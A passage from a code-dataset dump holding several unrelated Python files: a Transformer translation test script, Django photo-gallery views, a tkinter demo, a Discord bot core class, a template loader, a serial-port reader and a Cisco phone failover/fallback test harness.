range(max_len-1):\n trg_mask = generate_subseq_mask(ys.size(1)).to(device)\n out = model.decode(memory, ys,\n src_mask, trg_mask)\n prob = model.projector(out[:, -1])\n _, next_word = torch.max(prob, dim = 1)\n next_word = next_word.item()\n next_word_ys = torch.ones(1, 1).fill_(next_word).long().to(device)\n ys = torch.cat([ys, next_word_ys], dim=1)\n if next_word == end_symbol:\n break\n return ys\n\ndef load_sp_model(model_path):\n sp = spm.SentencePieceProcessor()\n sp.Load(model_path)\n return sp\n\ndef test(args):\n max_len = args.max_len\n w2i_src_file = args.w2i_map_file + \"_src.pkl\"\n w2i_trg_file = args.w2i_map_file + \"_trg.pkl\"\n with open(w2i_src_file, \"rb\") as f:\n w2i_src = pickle.load(f)\n src_vocab_size = len(w2i_src)\n print(\"[INFO] source vocab size: {:d}\".format(src_vocab_size))\n with open(w2i_trg_file, \"rb\") as f:\n w2i_trg = pickle.load(f)\n trg_vocab_size = len(w2i_trg)\n i2w_trg = {v: str(k) for k, v in w2i_trg.items()}\n print(\"[INFO] target vocab size: {:d}\".format(trg_vocab_size))\n\n w2i_src = defaultdict(lambda: w2i_src[\"\"], w2i_src)\n w2i_trg = defaultdict(lambda: w2i_trg[\"\"], w2i_trg)\n\n # load model\n model_info = torch.load(args.model_path + \"_\" + str(args.model_ckpt) + \".tar\")\n transformer = make_model(src_vocab_size, trg_vocab_size)\n transformer.load_state_dict(model_info[\"model_state_dict\"])\n transformer.to(device)\n print(\"[INFO] reload model from {}\".format(args.model_path + \"_\" + str(args.model_ckpt) + \".tar\"))\n\n # load sentence piece model\n sp = load_sp_model(args.sp_model_path)\n\n # write result here\n with open(args.result_file, \"w+\", encoding=\"utf-8\") as f:\n data_iter = test_data_iter(args.test_file, args.src_suffix, args.trg_suffix, w2i_src, w2i_trg)\n for idx, cur_sample in enumerate(data_iter):\n # decoded = greedy_decode(transformer, cur_sample.src, cur_sample.src_mask,\n # max_len, start_symbol=w2i_trg[\"\"], end_symbol=w2i_trg[\"\"])\n decoded = beam_search_decode(beam_search_decode_step,transformer, cur_sample.src, cur_sample.src_mask,\n max_len, start_symbol=w2i_trg[\"\"], end_symbol=w2i_trg[\"\"],beam_size=5)\n\n decoded_str = list(decoded.cpu().numpy()[0])\n decoded_str = [i2w_trg[x] for x in decoded_str]\n # remove \n decoded_str = decoded_str[1:]\n # remove \n if decoded_str[-1] == \"\":\n decoded_str = decoded_str[:-1]\n decoded_str = sp.DecodePieces(decoded_str)\n f.write(decoded_str + \"\\n\")\n if (idx + 1) % 1000 == 0:\n print(idx)\n\n\nif __name__ == \"__main__\":\n args = argps()\n test(args)\n\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"455479367","text":"from django.conf import settings\nfrom django.shortcuts import get_object_or_404\nfrom django.core.urlresolvers import reverse\nfrom django.views.generic import ListView, DetailView, TemplateView\nfrom photos.models import Photo, PhotoSet\n\n\nPHOTOS_PER_PAGE = 24\n\n\nclass NavigationMixin(object):\n def get_context_data(self, **kwargs):\n ctx = super(NavigationMixin, self).get_context_data(**kwargs)\n if not ctx:\n ctx = {}\n\n sets = settings.PHOTOSETS\n psets = PhotoSet.objects.filter(flickr_id__in=[s[0] for s in sets])\n # Keep order\n pset_dict = dict([(s.flickr_id, s) for s in psets])\n ctx['sets'] = [pset_dict[int(flickr_id)] for flickr_id, title in sets]\n return ctx\n\n\n#\n# VIEWS\n#\nclass PhotoListBase(ListView):\n model = Photo\n paginate_by = PHOTOS_PER_PAGE\n\n def get_queryset(self):\n self.photo_set = self.kwargs.get(\"photo_set\", \"\")\n pset = get_object_or_404(PhotoSet, slug=self.photo_set)\n return Photo.objects.filter(\n photo_order__photo_set=pset).order_by(\"photo_order__order\")\n\n\nclass PhotoListSnippet(PhotoListBase):\n template_name = \"pages/components/photo_list.html\"\n\n def get_context_data(self, **kwargs):\n ctx = super(PhotoListSnippet, self).get_context_data(**kwargs)\n ctx['page'] = ctx['page_obj']\n ctx['photos'] = ctx['object_list']\n return ctx\n\n\nclass PhotoListView(NavigationMixin, PhotoListBase):\n template_name = \"pages/photos.html\"\n\n def get_context_data(self, **kwargs):\n ctx = super(PhotoListView, self).get_context_data(**kwargs)\n ctx['photoset_slug'] = self.photo_set\n return ctx\n\n\nclass PhotoDetailView(DetailView):\n model = Photo\n template_name = \"pages/photo.html\"\n\n def get_object(self):\n flickr_id = self.kwargs.get(\"flickr_id\")\n return get_object_or_404(self.model, flickr_id=flickr_id)\n\n def get_back_url(self):\n order_obj = self.object.photo_order\n url = reverse('photo_list', args=(order_obj.photo_set.slug,))\n # Add page parameter if not on first page\n if order_obj.order > PHOTOS_PER_PAGE:\n url += \"?page=\" + str(((order_obj.order - 1) / PHOTOS_PER_PAGE) + 1)\n return url\n\n def get_photo_url(self):\n widths = (400, 633, 950, 1270, 1900, 2530)\n viewport_size = self.request.viewport_size\n\n width = widths[0]\n for w in widths:\n if w < viewport_size['width']:\n width = w\n else:\n break\n height = viewport_size['height']\n return self.object.get_boxed(width, height)\n\n def get_context_data(self, **kwargs):\n ctx = super(PhotoDetailView, self).get_context_data(**kwargs)\n if not ctx:\n ctx = {}\n ctx['back_url'] = self.get_back_url()\n ctx['photo_url'] = self.get_photo_url()\n return ctx\n\n\nclass Homepage(NavigationMixin, TemplateView):\n template_name = \"pages/homepage.html\"\n","sub_path":"pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"507354419","text":"from tkinter import *\n\nroot = Tk()\nroot.title(\"Entry Boxes\")\nroot.geometry('700x500')\n\nmy_label = Label(root, text = \"Enter the number of different frames : \").grid(row = 0 , column = 0 , padx =5, pady = 20)\nmy_frame_entry = Entry(root, width = 50 , bd = 3).grid(row = 0,column = 1)\n\n\ndef multiple_frames():\n new_label = Label(root, text = my_frame_entry.get())\n new_label.grid(row =4, column = 4)\n\n \nmy_confirm_button = Button(root, text = \"Confirm\", command = multiple_frames, bd = 3).grid(row = 1, column = 0, pady = 10 , padx = 5)\n\n\nroot.mainloop()","sub_path":"multippleEntry.py","file_name":"multippleEntry.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"117933647","text":"from .channel.mainchannel import MainBotChannel\nfrom .channel.pmbotchannel import PMBotChannel\nfrom .daily.dailymanager import DailyManager\nfrom .necrodb import NecroDB\nfrom .prefs.prefsmanager import PrefsManager\nfrom .race.racemanager import RaceManager\nfrom .util import console\nfrom .util.config import Config\n\n\nclass Necrobot(object):\n # Barebones constructor\n # client: [discord.Client] \n # logger: [logging.Logger]\n def __init__(self, client):\n self.client = client # the discord.Client object\n self.server = None # the discord.Server on which to read commands\n\n self._main_discord_channel = None # discord.Channel\n\n self._bot_channels = {} # maps discord.Channels onto BotChannels\n self._pm_bot_channel = None\n\n self._daily_manager = None\n self._race_manager = None\n self._prefs_manager = None\n\n self._initted = False\n self._quitting = False\n\n # Initializes object; call after client has been logged in to discord\n # server_id: [int]\n def post_login_init(self, server_id):\n console.info('-Logged in---------------')\n console.info('User name: {0}'.format(self.client.user.name))\n console.info('User id : {0}'.format(self.client.user.id))\n\n # set up server\n try:\n int(server_id)\n id_is_int = True\n except ValueError:\n id_is_int = False\n\n if self.client.servers:\n for s in self.client.servers:\n if id_is_int and s.id == server_id:\n console.info(\"Server id: {}\".format(s.id))\n self.server = s\n elif s.name == server_id:\n console.info(\"Server id: {}\".format(s.id))\n self.server = s\n else:\n console.error('Could not find the server.')\n exit(1)\n\n console.info('-------------------------')\n console.info(' ')\n\n self._main_discord_channel = self.find_channel(Config.MAIN_CHANNEL_NAME)\n if self._main_discord_channel is None:\n console.error('Could not find the \"{0}\" channel.'.format(Config.MAIN_CHANNEL_NAME))\n exit(1)\n\n if not self._initted:\n # Create new data\n self.register_bot_channel(self._main_discord_channel, MainBotChannel(self))\n self._pm_bot_channel = PMBotChannel(self)\n self._daily_manager = DailyManager(self)\n self._race_manager = RaceManager(self)\n self._prefs_manager = PrefsManager(self)\n self._initted = True\n else:\n self.refresh()\n\n def refresh(self):\n channel_pairs = {}\n for channel, bot_channel in self._bot_channels.items():\n new_channel = self.find_channel_with_id(channel.id)\n if new_channel is not None:\n channel_pairs[new_channel] = bot_channel\n bot_channel.refresh(new_channel)\n self._bot_channels = channel_pairs\n\n if self._daily_manager is not None:\n self._daily_manager.refresh()\n if self._race_manager is not None:\n self._race_manager.refresh()\n if self._prefs_manager is not None:\n self._prefs_manager.refresh()\n\n def cleanup(self):\n if self._daily_manager is not None:\n self._daily_manager.close()\n if self._race_manager is not None:\n self._race_manager.close()\n if self._prefs_manager is not None:\n self._prefs_manager.close()\n self._bot_channels.clear()\n\n # Returns the BotChannel corresponding to the given discord.Channel, if one exists\n # discord_channel: [discord.Channel]\n def get_bot_channel(self, discord_channel):\n if discord_channel.is_private:\n return self._pm_bot_channel\n else:\n return self._bot_channels[discord_channel]\n\n # Causes the Necrobot to use the given module\n # Doesn't check for duplicates\n # module: [command.Module]\n def register_bot_channel(self, discord_channel, bot_channel):\n self._bot_channels[discord_channel] = bot_channel\n\n def unregister_bot_channel(self, discord_channel):\n del self._bot_channels[discord_channel]\n\n # True if the bot wants to quit (i.e. if logout() has been called)\n @property\n def quitting(self):\n return self._quitting\n\n # Return the #necrobot_main channel\n # return: [discord.Channel]\n @property\n def main_channel(self):\n return self._main_discord_channel\n\n # Get a list of all admin roles on the server\n # return: [list]\n @property\n def admin_roles(self):\n admin_roles = []\n for rolename in Config.ADMIN_ROLE_NAMES:\n for role in self.server.roles:\n if role.name == rolename:\n admin_roles.append(role)\n return admin_roles\n\n @property\n def race_manager(self):\n return self._race_manager\n\n @property\n def daily_manager(self):\n return self._daily_manager\n\n @property\n def prefs_manager(self):\n return self._prefs_manager\n\n # Returns true if the user is a server admin\n # user: [discord.User]\n # return: [bool]\n def is_admin(self, user):\n member = self.get_as_member(user)\n admin_roles = self.admin_roles\n for role in member.roles:\n if role in admin_roles:\n return True\n return False\n\n # Returns the channel with the given name on the server, if any\n # channel_name: [string]\n # return: [discord.Channel]\n def find_channel(self, channel_name):\n for channel in self.server.channels:\n if channel.name == channel_name:\n return channel\n return None\n\n # Returns the channel with the given name on the server, if any\n # channel_name: [int]\n # return: [discord.Channel]\n def find_channel_with_id(self, channel_id):\n for channel in self.server.channels:\n if int(channel.id) == int(channel_id):\n return channel\n return None\n\n # Returns a some members with a given username (capitalization ignored)\n # username: [string]\n # return: [list]\n def find_member(self, username):\n for member in self.server.members:\n if member.display_name.lower() == username.lower():\n return member\n\n # Returns a list of all members with a given username (capitalization ignored)\n # username: [string]\n # return: [list]\n def find_members(self, username):\n to_return = []\n for member in self.server.members:\n if member.display_name.lower() == username.lower():\n to_return.append(member)\n return to_return\n\n # Returns the given Discord user as a member of the server\n # user: [discord.User]\n # return: [discord.Member]\n def get_as_member(self, user):\n for member in self.server.members:\n if int(member.id) == int(user.id):\n return member\n\n # Registers all users currently on the server\n def register_all_users(self):\n NecroDB().register_all_users(self.server.members)\n\n # Registers a specific user on the server\n # member: [discord.Member]\n @staticmethod\n def register_user(member):\n NecroDB().register_all_users([member])\n\n# Coroutines--------------------\n # Log out of discord\n async def logout(self):\n self._quitting = True\n await self.client.logout()\n\n # Log out of discord, but do not set quitting flag\n async def reboot(self):\n await self.client.logout()\n\n # Call this when anyone joins the server\n async def on_member_join(self, member):\n self.register_user(member)\n \n # Executes a command\n # cmd: [command.Command]\n async def execute(self, cmd):\n # don't care about bad commands\n if cmd.command is None:\n return\n\n # don't reply to self\n if cmd.author == self.client.user:\n return\n\n # handle the command with the appropriate bot channel\n if cmd.is_private:\n await self._pm_bot_channel.execute(cmd)\n elif cmd.channel in self._bot_channels:\n await self._bot_channels[cmd.channel].execute(cmd)\n","sub_path":"necrobot/necrobot.py","file_name":"necrobot.py","file_ext":"py","file_size_in_byte":8354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"398450899","text":"#!/usr/bin/env python\n\n'''\nCreated by Samvel Khalatyan, Feb 28, 2012\nCopyright 2011, All rights reserved\n'''\n\nfrom channel_template import ChannelTemplate, MCChannelTemplate\nfrom channel_type import ChannelType\nfrom input_template import InputTemplate\nfrom input_type import InputType\nfrom root.template import TemplateLoader\nfrom root.error import StatError\n\nfrom util.timer import Timer\n\nclass InputTemplateLoader(InputType, TemplateLoader):\n def __init__(self, input_type):\n InputType.__init__(self, input_type)\n TemplateLoader.__init__(self)\n\n self.templates = {}\n\n self.use_folders = []\n self.ban_folders = []\n\n self.use_plots = []\n self.ban_plots = []\n\n @Timer(label = \"[load templates from file]\", verbose = True)\n def load(self, filename):\n self.templates = {}\n\n TemplateLoader.load(self, filename)\n\n def process_plot(self, template):\n if ((self.use_plots\n and template.name in self.use_plots\n and template.name not in self.ban_plots)\n\n or (not self.use_plots and template.name not in self.ban_plots)):\n\n self.templates[template.path + '/' +\n template.name] = InputTemplate(self.type, template)\n\n def process_folder(self, folder, path):\n if ((self.use_folders\n and path in self.use_folders\n and path not in self.ban_folders)\n\n or (not self.use_folders and path not in self.ban_folders)):\n\n self.load_plots(folder, path)\n\n\n\nclass ChannelTemplateLoader(object):\n def __init__(self, filename, error=21):\n self.__plots = {}\n self.__filename = filename\n\n self.use_folders = []\n self.use_plots = []\n\n ChannelTemplate.hist.set_percent(error)\n\n @property\n def plots(self):\n return self.__plots\n\n def load(self, channel_types):\n self.__plots = {}\n\n for channel_type in channel_types:\n channel_plots = self.load_channel(channel_type)\n\n for name, channel in channel_plots.items():\n channels = self.plots.get(name)\n if not channels:\n channels = {}\n self.plots[name] = channels\n\n if channel.type in channels:\n raise RuntimeError(\"channel {0} is already loaded\")\n\n channels[channel.type] = channel\n\n # all the cahnnels are loaded, combine MC\n for plot, channels in self.plots.items():\n if \"mc\" in channels:\n raise RuntimeError((\"Monte-Carlo combined is already present \"\n \"for plot {0}\").format(plot))\n\n mc = MCChannelTemplate(\"mc\")\n for channel_type in set(channels.keys()) & set(mc.allowed_inputs):\n mc.add(channels[channel_type])\n\n if len(mc.input_templates):\n channels[mc.type] = mc\n\n def load_channel(self, channel_type):\n channel_plots = {}\n\n for input_type in ChannelType(channel_type).allowed_inputs:\n templates = self.load_input(input_type)\n\n # merge loaded templates into channels\n for name, template in templates.items():\n channel = channel_plots.get(name)\n if not channel:\n channel = ChannelTemplate(channel_type)\n channel_plots[name] = channel\n\n channel.add(template)\n\n return channel_plots\n\n def load_input(self, input_type):\n loader = InputTemplateLoader(input_type)\n loader.use_folders.extend(self.use_folders)\n loader.use_plots.extend(self.use_plots)\n loader.load(\"{0}/{1}\".format(loader.type, self.__filename))\n\n return loader.templates\n\n def __str__(self):\n result = []\n for k, channels in self.plots.items():\n result.append(\"{0:-<80}\".format(\"-- {0} \".format(k)))\n \n for c in channels.values():\n result.append(\"{0:>20}: {1}\".format(c.type, [x.type for x in c.input_templates]))\n\n return '\\n'.join(result)\n","sub_path":"python/template/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"295161672","text":"n,m = map(int,input().split())\nlist1=list(map(int, input().strip().split(' ')))\nlist2=list(map(int, input().strip().split(' ')))\nlist1.sort(reverse=True)\n\n\ncount = 0\nfor i in range(n):\n for j in range(m):\n if list1[i]==list2[j]or list1[i] 0:\n\t\tout += ser.read(1)\n\treturn out.decode(\"utf-8\")\n\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tfile_object = open('text.txt', 'w')\n\t\tb = b''\n\t\tser.open()\n\t\tser.flushInput()\n\t\tser.flushOutput()\n\t\tprint ('Hello')\n\t\tcounter = 0;\n\t\twhile (1):\n\t\t\t# uart_write()\n\t\t\tb = uart_read()\n\t\t\tb = b.strip()\n\t\t\t#print (b)\n\t\t\tif (len(b) > 2):\n\t\t\t\t#counter += 1\n\t\t\t\tcounter = b[6:9]\n\t\t\t\tb = b[1:5]\n\t\t\t\tfile_object.write('{0}\\n'.format(b))\n\t\t\t\tprint(\"{1}:{0}\".format(b,counter))\n\t\tser.close()\n\texcept Exception as e:\n\t\tprint (e)\n\tfinally:\n\t\tfile_object.close()\n\t\tser.close()\n","sub_path":"uartreader/uartreader_filesave.py","file_name":"uartreader_filesave.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"612228326","text":"#!/usr/bin/env python\n\"\"\"\nScript Header\n\n$Id: cmSG_3pcc_failover_fallback_base.py\n\nCopyright (c) 2016-2017 Cisco Systems, Inc.\n\nNotes:\n Basic APIs for failover and fallback feature\n\nAuthor:\n Yue Yu(yueyu@cisco.com)\n\nKnown bugs:\n\n\"\"\"\n\nimport logging\nimport csv\nimport time\nfrom os.path import dirname, realpath\nfrom os.path import join as p_join\nimport collections\nimport re\nimport tng\nfrom ConfigParser import NoSectionError\nfrom tng.base_errors import TngError\nfrom tng.frontend.timing import wait, until\nfrom tng_sl.contrib.mpp.phone_config_helper import PhoneConfigHelper\nfrom tng_sl.contrib.mpp.broadsoft_login_helper import BroadsoftLoginHelper\nfrom tng_sl.contrib.mpp.tshark_helper import TsharkHelper\nfrom tng_sl.device.endpoint.synergylite.synergylite_3pcc_extended import (\n wait_for_ccapi_call_states)\nfrom tng_sl.contrib.mpp.broadsoft.broadsoft_config import BroadsoftConfig\nfrom tng_sl.contrib.mpp.Toolkit3pcc import Toolkit3pcc\nlog = logging.getLogger('FOFBBaseClass')\n\n\ndef test(self):\n log.info(\"Start of running case\")\n self.run_each_case(self.sip_transport)\n if self.sip_method == 'register':\n self.analyse_tshark_capture_reg(self.sip_transport)\n else:\n self.analyse_tshark_capture_other(self.sip_transport)\n log.info(\"End of running case\")\n\n\nclass FOFBBaseClass(object):\n helpers = (PhoneConfigHelper, BroadsoftLoginHelper, TsharkHelper)\n helper_num_devices = 1\n reg_expires = 60\n # change fallback time smaller to make phone fall back earlier\n # otherwise invite case cannot pass\n fallback_time = 27\n sip_timer_F = 16\n sip_timer_B = 16\n long_retry = 1200\n short_retry = 1200\n key_file_tls = None\n cert_file_tls = None\n custom_CA = ''\n sip_port = '5060'\n sip_contacts = None\n # subscribe related parameters\n sub_type = 'feature_key_sync'\n feature_key_sync = '0'\n hoteling = '0'\n blf_listUri = ''\n blf_use_line = '0'\n blf_expires = '1800'\n share_call_appearance = 'private'\n share_ext = '0'\n ignore_tcp_seq = '-o tcp.analyze_sequence_numbers:false'\n\n @classmethod\n def set_tests_on_class(cls):\n cls.toolkit = Toolkit3pcc()\n cls.FOFB_file_tls = 'FOFBcases_tls_sanity.csv'\n cls.FOFB_file = 'FOFBcases_sanity.csv'\n try:\n if cls.toolkit.get_test_env_info(\n section='fofb',\n parameter_name='test_mode') == 'regression':\n cls.FOFB_file_tls = 'FOFBcases_tls.csv'\n cls.FOFB_file = 'FOFBcases.csv'\n log.info(\"Running Regression FOFB test cases\")\n except NoSectionError:\n log.debug(\"config file {} did not contain [fofb] section\".format(\n cls.toolkit.get_env_full_path()), exc_info=True)\n\n # CASE_NO_TOTAL is the total test cases number\n # use number of lines of the csv file, avoid blank line in the file\n if cls.sip_transport == 'TLS':\n config_file = cls.FOFB_file_tls\n else:\n config_file = cls.FOFB_file\n with open(p_join(dirname(realpath(\n __file__)), '..', '..', 'data', 'FOFB_conf',\n config_file)) as tcfile:\n CASE_NO_TOTAL = len(tcfile.readlines()) - 1\n # add a unique test case name for each item in the file\n for i in range(1, CASE_NO_TOTAL + 1):\n test_name = 'test_{:0>3}'.format(i)\n log.debug(\"cls: %s, test: %s -> %r\", cls, test_name, test)\n setattr(cls, 'test_{:0>3}'.format(i), test)\n\n @classmethod\n def setUpClass(cls):\n log.info('Start of setUpClass')\n cls.origin_proxy = cls.toolkit.get_test_env_info(\n section='phone', parameter_name=\"proxy\")\n cls.time_to_wait_capture = cls.reg_expires\n cls.dns_data = cls.toolkit.get_test_env_info(section='dns')\n cls.bsoft_data = cls.toolkit.get_test_env_info(section='bsoft')\n cls.fofb_data = cls.toolkit.get_test_env_info(section='fofb')\n cls.dns_device = tng.api.get_system('dns1')\n cls.primary_dns = cls.dns_device.get_ip()\n cls.user_id = cls.phone_data['userID1']\n cls.user_id_blf = cls.phone_data['userID2']\n cls.proxy_blf = cls.phone_data['proxy_srv1']\n cls.proxy_srv = cls.phone_data['proxy_srv2']\n cls.custom_CA = cls.fofb_data['custom_ca_fofb']\n cls.secondary_proxy = cls.bsoft_data['as_ip_addr']\n cls.secondary_proxy6 = cls.bsoft_data['as_ip_addr6']\n cls.simp_device = tng.api.get_system('simproxy')\n cls.simp6_device = tng.api.get_system('simproxy6')\n cls.simproxy = cls.simp_device.get_ip()\n cls.simproxy6 = cls.simp6_device.get_ip()\n cls.phone_ipaddr = cls.oPhone1.ui.get_param_value('Current IP')\n cls.phone_ipaddr6 = cls.oPhone1.ui.get_param_value('Current IP_IPV6')\n # For TLS, use simporxy2nd to simulate second proxy\n # since BS does not support TLS\n cls.simp2nd_device = tng.api.get_system('simproxy2nd')\n cls.simp2nd6_device = tng.api.get_system('simproxy2nd6')\n cls.simproxy2nd = cls.simp2nd_device.get_ip()\n cls.simproxy2nd6 = cls.simp2nd6_device.get_ip()\n cls.oPhone1.model = cls.oPhone1.ui.get_param_value('Product Name')\n\n if cls.sip_transport != 'TLS':\n cls.custom_CA = ''\n\n # configure broadsoft server\n def CleanupBsAfterAllCases():\n log.info('change domain on broadsoft server')\n cls.bsoft_web.change_device_domain(\n 'group admin', cls.user_id, cls.origin_proxy)\n cls.addCleanupClass(CleanupBsAfterAllCases)\n\n cls.bsoft_web.change_device_domain(\n 'group admin', cls.user_id, cls.proxy_srv)\n\n # config blf, user_id monitor user_id_blf\n if cls.sub_type == 'blf':\n log.info('set blf list uri on broadsoft server')\n cls.broadsoft = BroadsoftConfig()\n cls.blf_listUri = '{}_listUri@{}'.format(\n cls.user_id, cls.proxy_srv)\n cls.xsi_user = '{}@{}'.format(cls.user_id, cls.proxy_blf)\n\n def CleanupBlfAfterAllCases():\n log.info(\"clear blf list uri on broadsoft server\")\n cls.broadsoft.set_busy_lamp_field(\n list_uri=cls.blf_listUri, blf_monitored_user_id=[],\n user_id_proxy=cls.xsi_user, user_id=cls.user_id)\n cls.addCleanupClass(CleanupBlfAfterAllCases)\n\n cls.broadsoft.set_busy_lamp_field(\n list_uri=cls.blf_listUri,\n blf_monitored_user_id=['{}@{}'.format(\n cls.user_id_blf, cls.proxy_blf)],\n user_id_proxy=cls.xsi_user, user_id=cls.user_id)\n\n # config hoteling\n elif cls.sub_type == 'hoteling':\n log.info(\"Enable hoteling on broadsoft server\")\n\n def CleanupHtlAfterAllCases():\n log.info(\"Disable hoteling on broadsoft server\")\n cls.bsoft_web.disable_hoteling_host(\n account_type=\"group admin\", user_phone_num=cls.user_id)\n cls.addCleanupClass(CleanupHtlAfterAllCases)\n\n cls.bsoft_web.enable_hoteling_host(\n account_type=\"group admin\", user_phone_num=cls.user_id)\n\n # config share line\n elif cls.sub_type == 'shareline':\n log.info(\"Add shared line on broadsoft server\")\n model_pattern = re.compile('-(\\d{4}).*-')\n re_result = model_pattern.search(cls.oPhone1.model)\n if not re_result:\n raise TngError(\n \"Unable to get phone1's model number from string %r.\" %\n cls.oPhone1.model)\n model_number = re_result.group(1)\n bsoft_phone1_model = 'Cisco-Hybrid-{}'.format(model_number)\n cls.phone1_sharedId1 = cls.user_id + '_' + str(int(time.time()))\n\n def CleanupScaAfterAllCases():\n log.info(\"clear share line on broadsoft server\")\n if hasattr(cls, 'phone1_sharedName1'):\n cls.bsoft_web.delete_shared_line(\n cls.user_id, cls.phone1_sharedName1,\n account_type='user')\n cls.addCleanupClass(CleanupScaAfterAllCases)\n\n cls.phone1_sharedName1 = cls.bsoft_web.configure_shared_line(\n cls.phone1_sharedId1, bsoft_phone1_model, cls.user_id,\n account_type='group admin', proxy=cls.proxy_srv)\n\n def CleanupAfterAllCases():\n cls.oPhone1.ui.set_web_parameter_http(\n BLF_List=['Att Console', 'BLF List URI', ''],\n Debug_Level=['System', 'Debug Level', 'NOTICE'],\n IP_Mode=['System', 'IP Mode', 'Dual Mode'],\n Custom_CA=['Provisioning', 'Custom CA Rule', ''])\n cls.check_phone_settings(\n cls.oPhone1,\n IP_Mode=['IP_Mode', 'Dual Mode'])\n cls.addCleanupClass(CleanupAfterAllCases)\n\n # set proxy empty to make sure no register message at first\n cls.oPhone1.ui.set_web_parameter_http(\n SIP_Timer_F=['SIP', 'SIP Timer F', cls.sip_timer_F],\n SIP_Timer_B=['SIP', 'SIP Timer B', cls.sip_timer_B],\n SIP_Long_Retry=['SIP', 'Reg Retry Long Intvl', cls.long_retry],\n SIP_Short_Retry=['SIP', 'Reg Retry Intvl', cls.short_retry],\n Proxy=['Ext 1', 'Proxy', ''],\n UserId=['Ext 1', 'User ID', cls.user_id],\n Reg_Expires=['Ext 1', 'Register Expires', cls.reg_expires],\n Fallback_Time=['Ext 1', 'Proxy Fallback Intvl', cls.fallback_time],\n Outbound_Proxy=['Ext 1', 'Outbound Proxy', ''],\n TLS_Name_Validate=['Ext 1', 'TLS Name Validate', 0],\n IP_Mode=['System', 'IP Mode', 'Dual Mode'],\n Custom_CA=['Provisioning', 'Custom CA Rule', cls.custom_CA],\n Debug_Level=['System', 'Debug Level', 'DEBUG'],\n BLF_List=['Att Console', 'BLF List URI', cls.blf_listUri],\n BLF_Expires=['Att Console', 'Subscribe Expires', cls.blf_expires],\n DNS_SRV=['Ext 1', 'Use DNS SRV', 1],\n DNS_SRV_Prefix=['Ext 1', 'DNS SRV Auto Prefix', 1],\n DNS_Order=['System', 'DNS Server Order', 'Manual'],\n DNS_Query_Mode=['System', 'DNS Query Mode', 'Parallel'],\n DNS_Primary=['System', 'Primary DNS', cls.primary_dns])\n\n # check phone configuration\n cls.check_phone_settings(\n cls.oPhone1,\n SIP_Timer_F=['SIP_Timer_F', str(cls.sip_timer_F)],\n SIP_Timer_B=['SIP_Timer_B', str(cls.sip_timer_B)],\n SIP_Long_Retry=['Reg_Retry_Long_Intvl', str(cls.long_retry)],\n SIP_Short_Retry=['Reg_Retry_Intvl', str(cls.short_retry)],\n Proxy=['Proxy_1_', None],\n UserId=['User_ID_1_', cls.user_id],\n Reg_Expires=['Register_Expires_1_', str(cls.reg_expires)],\n Fallback_Time=['Proxy_Fallback_Intvl_1_', str(cls.fallback_time)],\n Outbound_Proxy=['Outbound_Proxy_1_', None],\n IP_Mode=['IP_Mode', 'Dual Mode'],\n DNS_SRV=['Use_DNS_SRV_1_', 'Yes'],\n DNS_SRV_Prefix=['DNS_SRV_Auto_Prefix_1_', 'Yes'],\n DNS_Order=['DNS_Server_Order', 'Manual'],\n DNS_Query_Mode=['DNS_Query_Mode', 'Parallel'],\n DNS_Primary=['Primary_DNS', cls.primary_dns])\n # get phone's configurations from csv file\n cls.deq = cls.read_from_csv(cls.sip_transport)\n\n log.info('End of setUpClass')\n\n def setUp(self):\n log.info(\"Start of setup for case\")\n if self.sub_type == 'blf':\n linenum = self.oPhone1.get_phone_line_total_number()\n if linenum <= 1:\n self.skipTest(\"Phone only has one line, it can't be set BLF\")\n\n def CleanupAfterEachCase():\n # clean proxy and outbound proxy\n # to make sure the phone stop sending register messages\n log.info(\"Start of cleanup after each case\")\n self.oPhone1.phone_set_idle()\n self.oPhone1.ui.set_web_parameter_http(\n Proxy=['Ext 1', 'Proxy', ''],\n Outbound_Proxy=['Ext 1', 'Outbound Proxy', ''])\n self.check_phone_settings(\n self.oPhone1,\n Proxy=['Proxy_1_', None],\n Outbound_Proxy=['Outbound_Proxy_1_', None])\n\n # close simproxy subprocess\n if self.try_backup_rsc and self.sip_method == 'register' or (\n self.sip_method != 'register' and self.expect_msg != []):\n self.close_simproxy('simproxy.py', self.simp_device)\n self.close_simproxy('simproxyv6.py', self.simp6_device)\n if self.sip_transport == 'TLS' and self.expect_msg != []:\n self.close_simproxy('simproxy.py', self.simp2nd_device)\n self.close_simproxy('simproxyv6.py', self.simp2nd6_device)\n log.info(\"End of cleanup after each case\")\n\n self.addCleanup(CleanupAfterEachCase)\n log.info(\"End of setup for case\")\n\n # read different configurations for each case from csv file\n @classmethod\n def read_from_csv(cls, sip_transport):\n log.info('Start to read from csv')\n file_path = dirname(realpath(__file__))\n deq = collections.deque()\n if sip_transport == 'TLS':\n file_name = (\n file_path + '/../../data/FOFB_conf/' +\n cls.FOFB_file_tls)\n else:\n file_name = (\n file_path + '/../../data/FOFB_conf/' +\n cls.FOFB_file)\n with open(file_name) as testcases:\n reader = csv.DictReader(testcases)\n deq.extend(reader)\n log.info('End to read from csv')\n return deq\n\n @staticmethod\n def check_phone_settings(phone, **kwargs):\n for name, expected_value in kwargs.values():\n actual_value = phone.get_web_config(\n name)[0]\n assert (\n actual_value == expected_value,\n 'Check parameter:{}: Expected: {!r} Actual: {!r}'.format(\n name, expected_value, actual_value))\n\n # only '1' or '0' or '' is accepted for configurating parameters\n # change to Yes or No or None for checking accordingly\n def convert_set_value_for_check(self, value):\n if value == '1':\n return 'Yes'\n elif value == '0':\n return 'No'\n elif value == '':\n return None\n return value\n\n # check the ip address of sip message is correct\n def check_sip_reg_dst(self, reg_msg, dst_ip):\n log.info(\"Start to check register destination\")\n if ':' in dst_ip:\n reg_rsc = self.tshark.omd_get_attr(reg_msg, \"ipv6.dst\")\n else:\n reg_rsc = 